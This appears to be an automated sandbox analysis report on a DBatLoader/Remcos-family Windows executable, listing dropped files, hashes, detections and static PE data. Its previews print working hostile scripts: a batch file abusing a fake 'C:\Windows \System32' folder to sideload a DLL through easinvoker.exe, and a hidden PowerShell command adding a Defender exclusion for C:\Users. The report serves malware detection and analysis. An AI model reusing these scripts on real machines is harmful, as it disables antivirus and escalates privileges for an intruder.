	RFQ_PRICE_QUOTE.PDF.gz.exe	Get hash	malicious	DBatLoader	Browse
	Quote046567556755678PDF.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	uUex2ZIKEm.exe	Get hash	malicious	Remcos	Browse
	5QjIbz66vr.exe	Get hash	malicious	Remcos	Browse
	DHL_2017128_Documento_de_recibo,pdf.exe	Get hash	malicious	DBatLoader, DarkCloud	Browse
	DHL_Shipping_invoice__621407408,pdf.exe	Get hash	malicious	DBatLoader, DarkCloud	Browse
	SecuriteInfo.com.Win32.DropperX-gen.16131.21279.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	TTCOPY.exe	Get hash	malicious	DBatLoader	Browse
	lppob0Xe3W.exe	Get hash	malicious	DBatLoader, DarkCloud	Browse
	ES20230430221400_6280.PDF.exe	Get hash	malicious	FormBook	Browse
	SIPARI#U015e_NO._1691,pdf.exe	Get hash	malicious	DBatLoader, DarkCloud	Browse
	invoice.exe	Get hash	malicious	DarkCloud	Browse
	PA2OJuzsRu.exe	Get hash	malicious	FormBook	Browse
	PO-4501226854_WJO-001.xls	Get hash	malicious	DarkCloud	Browse
	esvkLlXsDw.exe	Get hash	malicious	DarkCloud	Browse

Created / dropped Files

C:\ProgramData\gfdghfhjf\logs.dat

Download File

Process:	C:\Users\Public\Libraries\flhgywjG.bat
File Type:	data
Category:	dropped
Size (bytes):	234
Entropy (8bit):	3.364956253410265
Encrypted:	false
SSDEEP:	3:rmlql+pfyfOlcFi5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:KlHwGlcc5YcIeeDAlS1gWAAe5q1gWAv
MD5:	E77FA7ABCBA4DA4E126A46A533C523A7
SHA1:	31A25A1BCD950052BB6000719ED88531905391B2
SHA-256:	945F91A37A34D2ECD2CD394F55D1A6AE16D9C640D81C6F84254916898945D65D
SHA-512:	60CDB6AFDACA950F6597D3AF79B1296C723EA56D4F963FD200239A21344A51620F41F77CED884C545399AD0CFD68606241E579364B710F003944DC85B9B5B6B2
Malicious:	false
Preview:	....[.2.0.2.3./.0.8./.0.4. .1.8.:.1.4.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\Public\Gjwyghlf.url

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Gjwyghlf.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.117404160633784
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMsmCIvsb6U+K9Pv:HRYFVmTWDyzPmCSE/bPv
MD5:	FA7F86C5F406841A82B2854722F8736B
SHA1:	F6003A979BD154F098247706E9338150B0AF58B0
SHA-256:	6C369171A61BA9D39731624F799A5EFD594197FA152E9F4369E0AAA91E9C9A02
SHA-512:	2084E0A725F2DC2704C4241774B6DF45D76B72A059AF96BF5001407FF75CD5B7C96B1C0E99EBDEA46A5E3CE28EBFD36054066CCFC7CC29975010BF858C04F63C
Malicious:	false
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Gjwyghlf.PIF"..IconIndex=21..HotKey=18..

C:\Users\Public\Libraries\Gjwyghlf.PIF

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1113600
Entropy (8bit):	7.278512693308651
Encrypted:	false
SSDEEP:	24576:+GBEKQCWCWF4bH7yT+YLWPP7/NCo6LboxSYVuDpa7Dfavrjnpi0JN:rDpd7/NC3LRYwNa7mvrjJ
MD5:	AE5AD2EFD8A9CF25AD9EB00EBE24EB92
SHA1:	2EEE8F21D06A2602ED0CD3E5DC3A8A0DEA8157D1
SHA-256:	CF39A14A2DC1FE5AA487B6FAF19C63BC97103DB670FA24C62832895E3002ECA2
SHA-512:	983E6138EA90D1AAD8963E4441218E644B4829336561D5C40E5AFDADC869FFD9CCF9434260BDE1EF3858E8D73616945E01E5306EB8A1023772CAFBF4066DD830
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................P...........k.......p....@..............................................@........................... ..`+...........................p..(q...........................`.......................(...............................text....!.......".................. ..`.itext...,...@.......&.............. ..`.data....o...p...p...T..............@....bss.....6...............................idata..`+... ...,..................@....tls....4....P...........................rdata.......`......................@..@.reloc..(q...p...r..................@..B.rsrc................d..............@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\GjwyghlfO.bat

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.1037932688089676
Encrypted:	false
SSDEEP:	6:tPUx2cL4r0/T2cLZ9PULT2cLZ9LhGKFIs2cLZZi2cL9aXSLp6N2cLAP2cL4nz/:tPhn0is8L6sVGeWkVPS93tOf
MD5:	55ABA243E88F6A6813C117FFE1FA5979
SHA1:	210B9B028A4B798C837A182321DBF2E50D112816
SHA-256:	5A11C5641C476891AA30E7ECFA57C2639F6827D8640061F73E9AFEC0ADBBD7D2
SHA-512:	68009C4C9BBEA75A3BFA9F79945D30957A95691EA405D031B4CA7F1CB47504BBC768FCAE59173885743AD4D6CFDD2313C3FE0ACB515E34E5C809ECDC7F45E307
Malicious:	false
Preview:	mkdir "\\?\C:\Windows " ..mkdir "\\?\C:\Windows \System32"..ECHO F\|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y..ECHO F\|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y..ECHO F\|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y.."C:\Windows \System32\easinvoker.exe"..ping 127.0.0.1 -n 6 > nul..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..exit..

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:gy:gy
MD5:	864B153879FD1B48A69B1696349100DF
SHA1:	7C2130011AB48A0997571F4AF3C3534159031F04
SHA-256:	D5F0EB6A8671AEC1295E01DCBAE8B70BBDBECE3BF94DAC0271185EA19C9E2F78
SHA-512:	B8935DC2945B37A05D7867645C26CFE8C3FE30DD31BAB487751F92A97935532913CAEDAB74032E31600B858F20520952E13D9BC6776C9160F9EFC077F0085088
Malicious:	false
Preview:	94..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe, Detection: malicious, Browse Filename: e50YC8LCQh.exe, Detection: malicious, Browse Filename: PURCHASE_ORDER_PRINT_REP_4100067077.doc, Detection: malicious, Browse Filename: Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc, Detection: malicious, Browse Filename: ShippingDoc00365483747848466448464PDF.exe, Detection: malicious, Browse Filename: RFQ_PRICE_QUOTE.PDF.gz.exe, Detection: malicious, Browse Filename: Quote046567556755678PDF.exe, Detection: malicious, Browse Filename: uUex2ZIKEm.exe, Detection: malicious, Browse Filename: 5QjIbz66vr.exe, Detection: malicious, Browse Filename: DHL_2017128_Documento_de_recibo,pdf.exe, Detection: malicious, Browse Filename: DHL_Shipping_invoice__621407408,pdf.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.16131.21279.exe, Detection: malicious, Browse Filename: TTCOPY.exe, Detection: malicious, Browse Filename: lppob0Xe3W.exe, Detection: malicious, Browse Filename: ES20230430221400_6280.PDF.exe, Detection: malicious, Browse Filename: SIPARI#U015e_NO._1691,pdf.exe, Detection: malicious, Browse Filename: invoice.exe, Detection: malicious, Browse Filename: PA2OJuzsRu.exe, Detection: malicious, Browse Filename: PO-4501226854_WJO-001.xls, Detection: malicious, Browse Filename: esvkLlXsDw.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\flhgywjG.bat

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\user\Desktop\tTIYCp2sf4.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	111405
Entropy (8bit):	5.052229481631208
Encrypted:	false
SSDEEP:	1536:hljNHW+bID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:hJxW+U/N8ago865w8DdD0wRYQ+b
MD5:	B23C6ED8594D6B0DBD479CB297F668C7
SHA1:	0BB9ABD7A4785838181E33F5D71C1EBA12AD4406
SHA-256:	56277178277C1920310C4BD97C523B0EC9D2D4BA09CCF836F4F30E689D79C63F
SHA-512:	5129FF81166D37AF2DB18CED8DA600771B20B4DE08A3CDCFD4187371A74E10672524567D3B19B67AB79B318E6A27DBCCB4ACB828210705E652E97D7D8F474D8E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...].d.P..v.....& ..........................<a............................. .......3........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\json[1].json

Download File

Process:	C:\Users\Public\Libraries\flhgywjG.bat
File Type:	JSON data
Category:	dropped
Size (bytes):	944
Entropy (8bit):	4.986151217402279
Encrypted:	false
SSDEEP:	12:tkEIind6UGkMyGWKyMPVGADRPrmai+H0mGdAPORkoao9W7im51w7CSD9pF6RjSa8:qydVauKyM8kzst7266m7RJaC1n
MD5:	6841BE6CFDFD4FE3A5681E4CAAFB5F7A
SHA1:	2C8FF6F6BC7107EBF75FC4547BCDD0CA9A06ABAF
SHA-256:	D352D4A8D640B5F69BEBC41E679296A270FCD36FF4A794D04AEF5A91CE12F691
SHA-512:	021FA18C664551342AA562C2C9FAE4C52F03D99E4D0283FDE30D279F262045FF9E4C6450C7EB4509D4F52CDEAD626D55F3B458C5ED3D16464E920AD2312FDD9F
Malicious:	false
Preview:	{. "geoplugin_request":"102.129.143.30",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Hunenberg",. "geoplugin_region":"Zug",. "geoplugin_regionCode":"ZG",. "geoplugin_regionName":"Zug",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.173",. "geoplugin_longitude":"8.4204",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.8744.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1296
Entropy (8bit):	5.347046705570045
Encrypted:	false
SSDEEP:	24:3vJPpQrLAo4KAxX5qRPD42HrCvKLoVZe9tCKnKJRSF8PQiBCn:BPerB4nqRL/HrCvjfe9tC4aR48oMC
MD5:	2598489F258E3D65872338E46A8293FB
SHA1:	2B0A6F9806D1C9176D4BCA978EB6CC93430115F3
SHA-256:	B6313F537C0E93ACEF56BC30F29F291EBF93AFC5837B5E6E04CD19789F3B4BEB
SHA-512:	E1CD2BD4978193ABF1B57C814600ABE3A5C1E23817F66C16807400C8364558222E1975C3ABD19701D348018FC0B3E2EEFBFFADA8E64AC6AC609076B06A89F875
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..<................):gK..G...$.1.q........System.Configuration4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txarpp4i.txz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4wn1jn4.khu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.7501482967878643
Encrypted:	false
SSDEEP:	96:ksD9wS0Cp6qikvhkvCCtOl+H9x1l+H9xr:rD9wW5+Oex1exr
MD5:	C6CABEF54283307126C1EA9D041F0C62
SHA1:	C81E9476B9B7C537EA7FE344D6A2CAFFAA01D16D
SHA-256:	64ADE3C2D763305015A9B6CF776FB8F2278F0F231D67512C9E4BFA006118A792
SHA-512:	CBB8D892B80C8BF9DACC07025A1993B3B3EA8A0119DAE80BD7D9DBF929B7D28BC37BE2132AB671B0A2C937973060E87A3C8F2C045B3442BDFD373ECAA273D288
Malicious:	false
Preview:	...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....&v.....T.........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...W.......Y....................yN\|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...W.......Y.....................K..R.o.a.m.i.n.g.....\.1......U3m..MICROS~1..D.......N...W.......Y........................M.i.c.r.o.s.o.f.t.....V.1......Ukm..Windows.@.......N...W.......Y.......................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...W.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...W.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U.f.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BIHBIYKU5H3I1MPXETH0.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.7501482967878643
Encrypted:	false
SSDEEP:	96:ksD9wS0Cp6qikvhkvCCtOl+H9x1l+H9xr:rD9wW5+Oex1exr
MD5:	C6CABEF54283307126C1EA9D041F0C62
SHA1:	C81E9476B9B7C537EA7FE344D6A2CAFFAA01D16D
SHA-256:	64ADE3C2D763305015A9B6CF776FB8F2278F0F231D67512C9E4BFA006118A792
SHA-512:	CBB8D892B80C8BF9DACC07025A1993B3B3EA8A0119DAE80BD7D9DBF929B7D28BC37BE2132AB671B0A2C937973060E87A3C8F2C045B3442BDFD373ECAA273D288
Malicious:	false
Preview:	...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....&v.....T.........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...W.......Y....................yN\|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...W.......Y.....................K..R.o.a.m.i.n.g.....\.1......U3m..MICROS~1..D.......N...W.......Y........................M.i.c.r.o.s.o.f.t.....V.1......Ukm..Windows.@.......N...W.......Y.......................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...W.......Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...W.......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U.f.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

C:\Windows \System32\KDECO.bat

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Windows \System32\easinvoker.exe

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Windows \System32\netutils.dll

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	111405
Entropy (8bit):	5.052229481631208
Encrypted:	false
SSDEEP:	1536:hljNHW+bID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:hJxW+U/N8ago865w8DdD0wRYQ+b
MD5:	B23C6ED8594D6B0DBD479CB297F668C7
SHA1:	0BB9ABD7A4785838181E33F5D71C1EBA12AD4406
SHA-256:	56277178277C1920310C4BD97C523B0EC9D2D4BA09CCF836F4F30E689D79C63F
SHA-512:	5129FF81166D37AF2DB18CED8DA600771B20B4DE08A3CDCFD4187371A74E10672524567D3B19B67AB79B318E6A27DBCCB4ACB828210705E652E97D7D8F474D8E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...].d.P..v.....& ..........................<a............................. .......3........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	527
Entropy (8bit):	4.93002924277763
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeT0sF7n+AFSkIrxMVlmJHaVzvv:/naD+AokItULVDv
MD5:	1E4493508EB6B3891A6134F6719B8CFF
SHA1:	5945034284D72C4F0513510A51F5667D2D14E65F
SHA-256:	5153D49A8705C8621F4DAA72287BE931D2D34346E4984EFB4B572CEDD95DA4AC
SHA-512:	5BF0B241EA0136A901EA0AA15D194ECA23B83C4C7586278097E20443A8D775F250FED7614CFDA37CB7171CE73512C4855E924E4AE35BE16150DDEC9AB8FC9649
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.278512693308651
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	tTIYCp2sf4.exe
File size:	1'113'600 bytes
MD5:	ae5ad2efd8a9cf25ad9eb00ebe24eb92
SHA1:	2eee8f21d06a2602ed0cd3e5dc3a8a0dea8157d1
SHA256:	cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2
SHA512:	983e6138ea90d1aad8963e4441218e644b4829336561d5c40e5afdadc869ffd9ccf9434260bde1ef3858e8d73616945e01e5306eb8a1023772cafbf4066dd830
SSDEEP:	24576:+GBEKQCWCWF4bH7yT+YLWPP7/NCo6LboxSYVuDpa7Dfavrjnpi0JN:rDpd7/NC3LRYwNa7mvrjJ
TLSH:	4E35CF27A3E50573F127363548A7B279DCAD7D2428293C816BE63E88BE376417F081D6
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	bdb1724676725259

Static PE Info

General

Entrypoint:	0x476bc4
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	051f371797f6e597d48d110e8ed68eca

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00472FC8h
call 00007F67BCDDBFA1h
mov eax, dword ptr [004FDDECh]
mov eax, dword ptr [eax]
call 00007F67BCE2EDB5h
mov ecx, dword ptr [004FDED0h]
mov eax, dword ptr [004FDDECh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00472D08h]
